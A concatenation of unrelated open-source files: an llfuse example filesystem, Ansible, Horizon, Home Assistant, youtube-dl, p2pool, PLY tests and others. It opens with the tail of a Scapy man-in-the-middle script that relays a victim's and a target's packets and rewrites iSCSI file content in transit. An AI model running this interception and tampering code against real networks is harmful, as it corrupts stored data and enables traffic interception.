if (packet[IP].dst == TARGET_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the target machine
packet[Ether].dst = TARGET_MAC
packet_hex = parse_to_hex(packet)
print packet_hex + "----"
# packets with destination to the target machine are just sent
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
elif (packet[IP].dst == VICTIM_IP) and (packet[Ether].dst == MY_MAC):
# we change the packet destination to the initiator machine
packet[Ether].dst = VICTIM_MAC
packet_hex = parse_to_hex(packet)
print packet_hex + "----"
# if we find "Test ISCSI File" in hex in the packet, we modify it to "Test ISCSI Hack" and inject
if ('54 65 73 74 20 49 53 43 53 49 20 46 69 6C 65' in packet_hex):
packet_hex = packet_hex.replace("54 65 73 74 20 49 53 43 53 49 20 46 69 6C 65", "54 65 73 74 20 49 53 43 53 49 20 48 61 63 6B")
print "\n\n\nFOUND THE FILE CONTENT!\n\n\n"
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
else: # else we just inject the original packet
os.system("echo '" + packet_hex + "' | hexinject -p -i eth0")
sniff(prn=handle_packet, filter=filter, iface=iface, count=0)
|
ginabythebay/camlistore
|
refs/heads/master
|
lib/python/fusepy/low-level/llfuse_example.py
|
21
|
#!/usr/bin/env python
'''
$Id: llfuse_example.py 46 2010-01-29 17:10:10Z nikratio $
Copyright (c) 2010, Nikolaus Rath <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
* Neither the name of the main author nor the names of other contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
from __future__ import division, print_function, absolute_import
import llfuse
import errno
import stat
import sys
class Operations(llfuse.Operations):
'''A very simple example filesystem'''
def __init__(self):
super(Operations, self).__init__()
self.entries = [
# name, attr
(b'.', { 'st_ino': 1,
'st_mode': stat.S_IFDIR | 0755,
'st_nlink': 2}),
(b'..', { 'st_ino': 1,
'st_mode': stat.S_IFDIR | 0755,
'st_nlink': 2}),
(b'file1', { 'st_ino': 2, 'st_nlink': 1,
'st_mode': stat.S_IFREG | 0644 }),
(b'file2', { 'st_ino': 3, 'st_nlink': 1,
'st_mode': stat.S_IFREG | 0644 }) ]
self.contents = { # Inode: Contents
2: b'Hello, World\n',
3: b'Some more file contents\n'
}
self.by_inode = dict()
self.by_name = dict()
for entry in self.entries:
(name, attr) = entry
if attr['st_ino'] in self.contents:
attr['st_size'] = len(self.contents[attr['st_ino']])
self.by_inode[attr['st_ino']] = attr
self.by_name[name] = attr
def lookup(self, parent_inode, name):
try:
attr = self.by_name[name].copy()
except KeyError:
raise llfuse.FUSEError(errno.ENOENT)
attr['attr_timeout'] = 1
attr['entry_timeout'] = 1
attr['generation'] = 1
return attr
def getattr(self, inode):
attr = self.by_inode[inode].copy()
attr['attr_timeout'] = 1
return attr
def readdir(self, fh, off):
for entry in self.entries:
if off > 0:
off -= 1
continue
yield entry
def read(self, fh, off, size):
return self.contents[fh][off:off+size]
def open(self, inode, flags):
if inode in self.contents:
return inode
else:
raise RuntimeError('Attempted to open() a directory')
def opendir(self, inode):
return inode
def access(self, inode, mode, ctx, get_sup_gids):
return True
if __name__ == '__main__':
if len(sys.argv) != 2:
raise SystemExit('Usage: %s <mountpoint>' % sys.argv[0])
mountpoint = sys.argv[1]
operations = Operations()
llfuse.init(operations, mountpoint, [ b"nonempty", b'fsname=llfuses_xmp' ])
llfuse.main()
|
tersmitten/ansible
|
refs/heads/devel
|
lib/ansible/plugins/action/async_status.py
|
54
|
# Copyright: (c) 2018, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.errors import AnsibleError
from ansible.plugins.action import ActionBase
from ansible.utils.vars import merge_hash
class ActionModule(ActionBase):
_VALID_ARGS = frozenset(('jid', 'mode'))
def run(self, tmp=None, task_vars=None):
results = super(ActionModule, self).run(tmp, task_vars)
del tmp # tmp no longer has any effect
if "jid" not in self._task.args:
raise AnsibleError("jid is required")
jid = self._task.args["jid"]
mode = self._task.args.get("mode", "status")
env_async_dir = [e for e in self._task.environment if
"ANSIBLE_ASYNC_DIR" in e]
if len(env_async_dir) > 0:
# for backwards compatibility we need to get the dir from
# ANSIBLE_ASYNC_DIR that is defined in the environment. This is
# deprecated and will be removed in favour of shell options
async_dir = env_async_dir[0]['ANSIBLE_ASYNC_DIR']
msg = "Setting the async dir from the environment keyword " \
"ANSIBLE_ASYNC_DIR is deprecated. Set the async_dir " \
"shell option instead"
self._display.deprecated(msg, "2.12")
else:
# inject the async directory based on the shell option into the
# module args
async_dir = self.get_shell_option('async_dir', default="~/.ansible_async")
module_args = dict(jid=jid, mode=mode, _async_dir=async_dir)
status = self._execute_module(task_vars=task_vars,
module_args=module_args)
results = merge_hash(results, status)
return results
|
zouyapeng/horizon
|
refs/heads/stable/juno
|
openstack_dashboard/dashboards/project/loadbalancers/views.py
|
10
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.loadbalancers \
import forms as project_forms
from openstack_dashboard.dashboards.project.loadbalancers \
import tabs as project_tabs
from openstack_dashboard.dashboards.project.loadbalancers \
import workflows as project_workflows
import re
class IndexView(tabs.TabView):
tab_group_class = (project_tabs.LoadBalancerTabs)
template_name = 'project/loadbalancers/details_tabs.html'
def post(self, request, *args, **kwargs):
obj_ids = request.POST.getlist('object_ids')
action = request.POST['action']
m = re.search('.delete([a-z]+)', action).group(1)
if obj_ids == []:
obj_ids.append(re.search('([0-9a-z-]+)$', action).group(1))
if m == 'monitor':
for obj_id in obj_ids:
try:
api.lbaas.pool_health_monitor_delete(request, obj_id)
messages.success(request, _('Deleted monitor %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete monitor. %s') % e)
if m == 'pool':
for obj_id in obj_ids:
try:
api.lbaas.pool_delete(request, obj_id)
messages.success(request, _('Deleted pool %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete pool. %s') % e)
if m == 'member':
for obj_id in obj_ids:
try:
api.lbaas.member_delete(request, obj_id)
messages.success(request, _('Deleted member %s') % obj_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete member. %s') % e)
if m == 'vip':
for obj_id in obj_ids:
try:
vip_id = api.lbaas.pool_get(request, obj_id).vip_id
except Exception as e:
exceptions.handle(request,
_('Unable to locate VIP to delete. %s')
% e)
if vip_id is not None:
try:
api.lbaas.vip_delete(request, vip_id)
messages.success(request, _('Deleted VIP %s') % vip_id)
except Exception as e:
exceptions.handle(request,
_('Unable to delete VIP. %s') % e)
return self.get(request, *args, **kwargs)
class AddPoolView(workflows.WorkflowView):
workflow_class = project_workflows.AddPool
class AddVipView(workflows.WorkflowView):
workflow_class = project_workflows.AddVip
def get_initial(self):
initial = super(AddVipView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['subnet'] = api.neutron.subnet_get(
self.request, pool.subnet_id).cidr
except Exception as e:
initial['subnet'] = ''
msg = _('Unable to retrieve pool subnet. %s') % e
exceptions.handle(self.request, msg)
return initial
class AddMemberView(workflows.WorkflowView):
workflow_class = project_workflows.AddMember
class AddMonitorView(workflows.WorkflowView):
workflow_class = project_workflows.AddMonitor
class PoolDetailsView(tabs.TabView):
tab_group_class = (project_tabs.PoolDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class VipDetailsView(tabs.TabView):
tab_group_class = (project_tabs.VipDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class MemberDetailsView(tabs.TabView):
tab_group_class = (project_tabs.MemberDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class MonitorDetailsView(tabs.TabView):
tab_group_class = (project_tabs.MonitorDetailsTabs)
template_name = 'project/loadbalancers/details_tabs.html'
class UpdatePoolView(forms.ModalFormView):
form_class = project_forms.UpdatePool
template_name = "project/loadbalancers/updatepool.html"
context_object_name = 'pool'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdatePoolView, self).get_context_data(**kwargs)
context["pool_id"] = self.kwargs['pool_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
pool_id = self.kwargs['pool_id']
try:
return api.lbaas.pool_get(self.request, pool_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve pool details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
pool = self._get_object()
return {'name': pool['name'],
'pool_id': pool['id'],
'description': pool['description'],
'lb_method': pool['lb_method'],
'admin_state_up': pool['admin_state_up']}
class UpdateVipView(forms.ModalFormView):
form_class = project_forms.UpdateVip
template_name = "project/loadbalancers/updatevip.html"
context_object_name = 'vip'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateVipView, self).get_context_data(**kwargs)
context["vip_id"] = self.kwargs['vip_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
vip_id = self.kwargs['vip_id']
try:
return api.lbaas.vip_get(self.request, vip_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve VIP details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
vip = self._get_object()
persistence = getattr(vip, 'session_persistence', None)
if persistence:
stype = persistence['type']
if stype == 'APP_COOKIE':
cookie = persistence['cookie_name']
else:
cookie = ''
else:
stype = ''
cookie = ''
return {'name': vip['name'],
'vip_id': vip['id'],
'description': vip['description'],
'pool_id': vip['pool_id'],
'session_persistence': stype,
'cookie_name': cookie,
'connection_limit': vip['connection_limit'],
'admin_state_up': vip['admin_state_up']}
class UpdateMemberView(forms.ModalFormView):
form_class = project_forms.UpdateMember
template_name = "project/loadbalancers/updatemember.html"
context_object_name = 'member'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateMemberView, self).get_context_data(**kwargs)
context["member_id"] = self.kwargs['member_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
member_id = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, member_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve member details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
member = self._get_object()
return {'member_id': member['id'],
'pool_id': member['pool_id'],
'weight': member['weight'],
'admin_state_up': member['admin_state_up']}
class UpdateMonitorView(forms.ModalFormView):
form_class = project_forms.UpdateMonitor
template_name = "project/loadbalancers/updatemonitor.html"
context_object_name = 'monitor'
success_url = reverse_lazy("horizon:project:loadbalancers:index")
def get_context_data(self, **kwargs):
context = super(UpdateMonitorView, self).get_context_data(**kwargs)
context["monitor_id"] = self.kwargs['monitor_id']
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
monitor_id = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, monitor_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve health monitor details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
monitor = self._get_object()
return {'monitor_id': monitor['id'],
'delay': monitor['delay'],
'timeout': monitor['timeout'],
'max_retries': monitor['max_retries'],
'admin_state_up': monitor['admin_state_up']}
class AddPMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.AddPMAssociation
def get_initial(self):
initial = super(AddPMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
class DeletePMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.DeletePMAssociation
def get_initial(self):
initial = super(DeletePMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
|
huwei/wechat-python-sdk
|
refs/heads/master
|
wechat_sdk/context/framework/django/backends/db.py
|
25
|
# -*- coding: utf-8 -*-
from django.db import IntegrityError, transaction, router
from django.utils import timezone
from wechat_sdk.context.framework.django.backends.base import ContextBase, CreateError
from wechat_sdk.context.framework.django.exceptions import SuspiciousOpenID
class ContextStore(ContextBase):
"""
数据库存储微信上下文对话
"""
def __init__(self, openid):
super(ContextStore, self).__init__(openid)
def load(self):
try:
s = Context.objects.get(
openid=self.openid,
expire_date__gt=timezone.now()
)
return self.decode(s.context_data)
except (Context.DoesNotExist, SuspiciousOpenID) as e:
self.create(self.openid)
return {}
def exists(self, openid):
return Context.objects.filter(openid=openid).exists()
def create(self, openid):
self.save(must_create=True)
self.modified = True
self._session_cache = {}
return
def save(self, must_create=False):
obj = Context(
openid=self.openid,
context_data=self.encode(self._get_context(no_load=must_create)),
expire_date=self.get_expiry_date()
)
self.clear_expired()
using = router.db_for_write(Context, instance=obj)
try:
with transaction.atomic(using=using):
obj.save(force_insert=must_create, using=using)
except IntegrityError:
if must_create:
raise CreateError
raise
def delete(self, openid=None):
if openid is None:
openid = self.openid
try:
Context.objects.get(openid=openid).delete()
except Context.DoesNotExist:
pass
@staticmethod
def clear_expired():
Context.objects.filter(expire_date__lt=timezone.now()).delete()
from wechat_sdk.context.framework.django.models import Context
|
mKeRix/home-assistant
|
refs/heads/dev
|
homeassistant/components/bbb_gpio/switch.py
|
7
|
"""Allows to configure a switch using BeagleBone Black GPIO."""
import logging
import voluptuous as vol
from homeassistant.components import bbb_gpio
from homeassistant.components.switch import PLATFORM_SCHEMA
from homeassistant.const import CONF_NAME, DEVICE_DEFAULT_NAME
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import ToggleEntity
_LOGGER = logging.getLogger(__name__)
CONF_PINS = "pins"
CONF_INITIAL = "initial"
CONF_INVERT_LOGIC = "invert_logic"
PIN_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAME): cv.string,
vol.Optional(CONF_INITIAL, default=False): cv.boolean,
vol.Optional(CONF_INVERT_LOGIC, default=False): cv.boolean,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_PINS, default={}): vol.Schema({cv.string: PIN_SCHEMA})}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the BeagleBone Black GPIO devices."""
pins = config[CONF_PINS]
switches = []
for pin, params in pins.items():
switches.append(BBBGPIOSwitch(pin, params))
add_entities(switches)
class BBBGPIOSwitch(ToggleEntity):
"""Representation of a BeagleBone Black GPIO."""
def __init__(self, pin, params):
"""Initialize the pin."""
self._pin = pin
self._name = params[CONF_NAME] or DEVICE_DEFAULT_NAME
self._state = params[CONF_INITIAL]
self._invert_logic = params[CONF_INVERT_LOGIC]
bbb_gpio.setup_output(self._pin)
if self._state is False:
bbb_gpio.write_output(self._pin, 1 if self._invert_logic else 0)
else:
bbb_gpio.write_output(self._pin, 0 if self._invert_logic else 1)
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def should_poll(self):
"""No polling needed."""
return False
@property
def is_on(self):
"""Return true if device is on."""
return self._state
def turn_on(self, **kwargs):
"""Turn the device on."""
bbb_gpio.write_output(self._pin, 0 if self._invert_logic else 1)
self._state = True
self.schedule_update_ha_state()
def turn_off(self, **kwargs):
"""Turn the device off."""
bbb_gpio.write_output(self._pin, 1 if self._invert_logic else 0)
self._state = False
self.schedule_update_ha_state()
|
nghia-huynh/gem5-stable
|
refs/heads/master
|
src/mem/slicc/symbols/__init__.py
|
82
|
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Nathan Binkert
from slicc.symbols.Action import Action
from slicc.symbols.Event import Event
from slicc.symbols.Func import Func
from slicc.symbols.State import State
from slicc.symbols.RequestType import RequestType
from slicc.symbols.StateMachine import StateMachine
from slicc.symbols.Symbol import Symbol
from slicc.symbols.SymbolTable import SymbolTable
from slicc.symbols.Transition import Transition
from slicc.symbols.Type import Type
from slicc.symbols.Var import Var
|
wndias/bc.repository
|
refs/heads/master
|
script.module.youtube.dl/lib/youtube_dl/extractor/hotstar.py
|
28
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
determine_ext,
int_or_none,
)
class HotStarIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?hotstar\.com/(?:.+?[/-])?(?P<id>\d{10})'
_TESTS = [{
'url': 'http://www.hotstar.com/on-air-with-aib--english-1000076273',
'info_dict': {
'id': '1000076273',
'ext': 'mp4',
'title': 'On Air With AIB - English',
'description': 'md5:c957d8868e9bc793ccb813691cc4c434',
'timestamp': 1447227000,
'upload_date': '20151111',
'duration': 381,
},
'params': {
# m3u8 download
'skip_download': True,
}
}, {
'url': 'http://www.hotstar.com/sports/cricket/rajitha-sizzles-on-debut-with-329/2001477583',
'only_matching': True,
}, {
'url': 'http://www.hotstar.com/1000000515',
'only_matching': True,
}]
_GET_CONTENT_TEMPLATE = 'http://account.hotstar.com/AVS/besc?action=GetAggregatedContentDetails&channel=PCTV&contentId=%s'
_GET_CDN_TEMPLATE = 'http://getcdn.hotstar.com/AVS/besc?action=GetCDN&asJson=Y&channel=%s&id=%s&type=%s'
def _download_json(self, url_or_request, video_id, note='Downloading JSON metadata', fatal=True):
json_data = super(HotStarIE, self)._download_json(url_or_request, video_id, note, fatal=fatal)
if json_data['resultCode'] != 'OK':
if fatal:
raise ExtractorError(json_data['errorDescription'])
return None
return json_data['resultObj']
def _real_extract(self, url):
video_id = self._match_id(url)
video_data = self._download_json(
self._GET_CONTENT_TEMPLATE % video_id,
video_id)['contentInfo'][0]
formats = []
# PCTV for extracting f4m manifest
for f in ('TABLET',):
format_data = self._download_json(
self._GET_CDN_TEMPLATE % (f, video_id, 'VOD'),
video_id, 'Downloading %s JSON metadata' % f, fatal=False)
if format_data:
format_url = format_data['src']
ext = determine_ext(format_url)
if ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(format_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
elif ext == 'f4m':
# produce broken files
continue
else:
formats.append({
'url': format_url,
'width': int_or_none(format_data.get('width')),
'height': int_or_none(format_data.get('height')),
})
self._sort_formats(formats)
return {
'id': video_id,
'title': video_data['episodeTitle'],
'description': video_data.get('description'),
'duration': int_or_none(video_data.get('duration')),
'timestamp': int_or_none(video_data.get('broadcastDate')),
'formats': formats,
}
|
aferr/LatticeMemCtl
|
refs/heads/master
|
ext/ply/test/lex_state4.py
|
174
|
# lex_state4.py
#
# Bad state declaration
import sys
if ".." not in sys.path: sys.path.insert(0,"..")
import ply.lex as lex
tokens = [
"PLUS",
"MINUS",
"NUMBER",
]
states = (('comment', 'exclsive'),)
t_PLUS = r'\+'
t_MINUS = r'-'
t_NUMBER = r'\d+'
# Comments
def t_comment(t):
r'/\*'
t.lexer.begin('comment')
print("Entering comment state")
def t_comment_body_part(t):
r'(.|\n)*\*/'
print("comment body %s" % t)
t.lexer.begin('INITIAL')
def t_error(t):
pass
lex.lex()
|
ionux/p2pool
|
refs/heads/master
|
p2pool/bitcoin/getwork.py
|
267
|
'''
Representation of a getwork request/reply
'''
from __future__ import division
from . import data as bitcoin_data
from . import sha256
from p2pool.util import pack
def _swap4(s):
if len(s) % 4:
raise ValueError()
return ''.join(s[x:x+4][::-1] for x in xrange(0, len(s), 4))
class BlockAttempt(object):
def __init__(self, version, previous_block, merkle_root, timestamp, bits, share_target):
self.version, self.previous_block, self.merkle_root, self.timestamp, self.bits, self.share_target = version, previous_block, merkle_root, timestamp, bits, share_target
def __hash__(self):
return hash((self.version, self.previous_block, self.merkle_root, self.timestamp, self.bits, self.share_target))
def __eq__(self, other):
if not isinstance(other, BlockAttempt):
raise ValueError('comparisons only valid with other BlockAttempts')
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return 'BlockAttempt(%s)' % (', '.join('%s=%r' % (k, v) for k, v in self.__dict__.iteritems()),)
def getwork(self, **extra):
if 'data' in extra or 'hash1' in extra or 'target' in extra or 'midstate' in extra:
raise ValueError()
block_data = bitcoin_data.block_header_type.pack(dict(
version=self.version,
previous_block=self.previous_block,
merkle_root=self.merkle_root,
timestamp=self.timestamp,
bits=self.bits,
nonce=0,
))
getwork = {
'data': _swap4(block_data).encode('hex') + '000000800000000000000000000000000000000000000000000000000000000000000000000000000000000080020000',
'hash1': '00000000000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000010000',
'target': pack.IntType(256).pack(self.share_target).encode('hex'),
'midstate': _swap4(sha256.process(sha256.initial_state, block_data[:64])).encode('hex'),
}
getwork = dict(getwork)
getwork.update(extra)
return getwork
@classmethod
def from_getwork(cls, getwork):
attrs = decode_data(getwork['data'])
return cls(
version=attrs['version'],
previous_block=attrs['previous_block'],
merkle_root=attrs['merkle_root'],
timestamp=attrs['timestamp'],
bits=attrs['bits'],
share_target=pack.IntType(256).unpack(getwork['target'].decode('hex')),
)
def update(self, **kwargs):
d = self.__dict__.copy()
d.update(kwargs)
return self.__class__(**d)
def decode_data(data):
return bitcoin_data.block_header_type.unpack(_swap4(data.decode('hex'))[:80])
|
nimbis/django-shop
|
refs/heads/master
|
example/myshop/management/commands/fix_filer_bug_965.py
|
1
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.management.base import BaseCommand
from filer.models.imagemodels import Image
class Command(BaseCommand):
help = "Fix https://github.com/divio/django-filer/issues/965"
def handle(self, verbosity, *args, **options):
for img in Image.objects.all():
img.file_data_changed()
img.save()
|
TeamEOS/external_chromium_org
|
refs/heads/lp5.0
|
tools/telemetry/telemetry/results/page_test_results_unittest.py
|
9
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.results import base_test_results_unittest
from telemetry.page import page_set
from telemetry.results import page_test_results
class NonPrintingPageTestResults(
page_test_results.PageTestResults):
def __init__(self):
super(NonPrintingPageTestResults, self).__init__()
def _PrintPerfResult(self, *args):
pass
class PageTestResultsTest(base_test_results_unittest.BaseTestResultsUnittest):
def setUp(self):
self.page_set = page_set.PageSet(file_path=os.path.dirname(__file__))
self.page_set.AddPageWithDefaultRunNavigate("http://www.bar.com/")
self.page_set.AddPageWithDefaultRunNavigate("http://www.baz.com/")
self.page_set.AddPageWithDefaultRunNavigate("http://www.foo.com/")
@property
def pages(self):
return self.page_set.pages
def test_failures(self):
results = NonPrintingPageTestResults()
results.AddFailure(self.pages[0], self.CreateException())
results.AddSuccess(self.pages[1])
self.assertEquals(results.pages_that_had_failures,
set([self.pages[0]]))
self.assertEquals(results.successes, [self.pages[1]])
def test_errors(self):
results = NonPrintingPageTestResults()
results.AddError(self.pages[0], self.CreateException())
results.AddSuccess(self.pages[1])
self.assertEquals(results.pages_that_had_errors,
set([self.pages[0]]))
self.assertEquals(results.successes, [self.pages[1]])
def test_errors_and_failures(self):
results = NonPrintingPageTestResults()
results.AddError(self.pages[0], self.CreateException())
results.AddError(self.pages[1], self.CreateException())
results.AddSuccess(self.pages[2])
self.assertEquals(results.pages_that_had_errors_or_failures,
set([self.pages[0], self.pages[1]]))
self.assertEquals(results.successes, [self.pages[2]])
|
aequitas/home-assistant
|
refs/heads/dev
|
homeassistant/components/fritzbox/sensor.py
|
7
|
"""Support for AVM Fritz!Box smarthome temperature sensor only devices."""
import logging
import requests
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
from . import (
ATTR_STATE_DEVICE_LOCKED, ATTR_STATE_LOCKED, DOMAIN as FRITZBOX_DOMAIN)
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Fritzbox smarthome sensor platform."""
_LOGGER.debug("Initializing fritzbox temperature sensors")
devices = []
fritz_list = hass.data[FRITZBOX_DOMAIN]
for fritz in fritz_list:
device_list = fritz.get_devices()
for device in device_list:
if (device.has_temperature_sensor
and not device.has_switch
and not device.has_thermostat):
devices.append(FritzBoxTempSensor(device, fritz))
add_entities(devices)
class FritzBoxTempSensor(Entity):
"""The entity class for Fritzbox temperature sensors."""
def __init__(self, device, fritz):
"""Initialize the switch."""
self._device = device
self._fritz = fritz
@property
def name(self):
"""Return the name of the device."""
return self._device.name
@property
def state(self):
"""Return the state of the sensor."""
return self._device.temperature
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
def update(self):
"""Get latest data and states from the device."""
try:
self._device.update()
except requests.exceptions.HTTPError as ex:
_LOGGER.warning("Fritzhome connection error: %s", ex)
self._fritz.login()
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
attrs = {
ATTR_STATE_DEVICE_LOCKED: self._device.device_lock,
ATTR_STATE_LOCKED: self._device.lock,
}
return attrs
|
annahs/atmos_research
|
refs/heads/master
|
NC_plot_Dg_sigma_BCmassconc_DpDc_vs_altitude-fullcampaign.py
|
1
|
import sys
import os
import numpy as np
from pprint import pprint
from datetime import datetime
from datetime import timedelta
import mysql.connector
import math
import matplotlib.pyplot as plt
import matplotlib.colors
from matplotlib import dates
from mpl_toolkits.basemap import Basemap
import calendar
from scipy.optimize import curve_fit
from coating_info_from_raw_signal import CoatingData
cloud_droplet_conc = 0.5
savefig = False
show_distr_plots = False
coating_data_from_raw = False
#alt parameters
min_alt = 0
max_alt = 6000
alt_incr = 1000
#coating data parameters
coating_min_BC_VED = 160
coating_max_BC_VED = 180
coating_min_rBC_mass = ((coating_min_BC_VED/(10.**7))**3)*(math.pi/6.)*1.8*(10.**15)
coating_max_rBC_mass = ((coating_max_BC_VED/(10.**7))**3)*(math.pi/6.)*1.8*(10.**15)
print coating_min_rBC_mass, coating_max_rBC_mass
#Dg and sigma data parameters
bin_value_min = 80
bin_value_max = 220
bin_incr = 10
bin_number_lim = (bin_value_max-bin_value_min)/bin_incr
#constants
R = 8.3144621 # in m3*Pa/(K*mol)
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/Netcare/Spring 2015/lookup tables/coating_lookup_table_POLAR6_2015_UBCSP2-nc(2p26,1p26)-fullPSLcalib_used_factor545.lupckl'
